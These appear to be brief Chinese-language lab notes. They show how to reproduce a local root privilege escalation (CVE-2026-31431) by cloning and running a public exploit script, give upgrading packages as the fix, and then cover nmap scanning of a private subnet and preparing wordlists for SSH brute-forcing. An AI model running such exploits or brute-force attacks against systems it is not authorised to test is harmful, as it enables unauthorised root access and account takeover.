CVE-2026-31431 漏洞復現與修復

git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git

cd copy-fail-CVE-2026-31431/

python3 copy_fail_exp.py

image.png

不輸入密碼就直接到了root

需要sudo apt upgrade -y來避免

網路滲透測試

網路與服務掃描

nmap:網路安全審查與掃描工具

nmap 192.168.107.128/24:可得到網路中192.168.107.129有開ssh服務

image.png

帳密暴力破解

爆破,要開兩個檔案:使用者字典

準備一個使用者名稱,以及一個密碼檔,檔案中需要包含正確名稱和密碼

vim user.txt

vim password.txt